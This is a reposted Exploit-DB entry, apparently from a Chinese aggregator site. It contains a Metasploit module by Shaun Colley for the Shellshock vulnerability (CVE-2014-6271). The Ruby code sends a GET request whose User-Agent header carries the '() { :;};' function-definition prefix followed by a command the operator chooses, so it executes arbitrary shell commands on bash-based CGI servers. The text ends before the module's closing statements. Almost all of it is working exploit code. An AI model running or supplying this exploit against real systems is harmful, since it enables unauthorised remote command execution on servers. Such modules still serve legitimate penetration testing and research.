GNU Bash – Environment Variable Command Injection (Metasploit) - 体验盒子

作者： Shaun Colley

日期： 2014-09-25

类别：

remote

平台：

cgi

来源：https://www.exploit-db.com/exploits/34777/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})

super(update_info(info,

'Name' => 'bashedCgi',

'Description'=> %q{

Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command.

},

'Author' =>

[

'Stephane Chazelas',# vuln discovery

'Shaun Colley <scolley at ioactive.com>'# metasploit module

],

'License'=> MSF_LICENSE,

'References' => [ 'CVE', '2014-6271' ],

'Targets'=>

[

[ 'cgi', {} ]

],

'DefaultTarget'=> 0,

'Payload'=>

{

'Space'=> 1024,

'DisableNops' => true

},

'DefaultOptions' => { 'PAYLOAD' => 0 }

))

register_options(

[

OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),

OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])

], self.class)

end

def run

res = send_request_cgi({

'method' => 'GET',

'uri'=> datastore['TARGETURI'],

'agent'=> "() { :;}; " + datastore['CMD']

})

if res && res.code == 200

print_good("Command sent - 200 received")

else

print_error("Command sent - non-200 reponse")

end